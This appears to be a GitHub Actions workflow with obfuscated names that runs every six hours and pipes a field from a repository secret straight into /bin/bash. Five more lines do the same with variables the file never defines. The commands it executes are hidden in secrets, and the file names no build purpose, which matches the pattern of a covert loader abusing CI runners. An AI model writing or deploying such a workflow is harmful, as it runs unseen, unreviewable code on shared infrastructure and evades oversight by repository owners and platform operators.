name: hanturan4187

on:
  workflow_dispatch:
  schedule:
    - cron: '8 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hanturan4187
        env:
          f84: ${{ secrets.f84 }}
        run: |
          echo $f84 | jq -r .q738 | /bin/bash
          echo $by13471 | jq -r .wgx072 | /bin/bash
          echo $ie65 | jq -r .jxhjp5435 | /bin/bash
          echo $sp7 | jq -r .jbjt32 | /bin/bash
          echo $dvkr37752 | jq -r .iu03 | /bin/bash
          echo $wq3422 | jq -r .n88 | /bin/bash

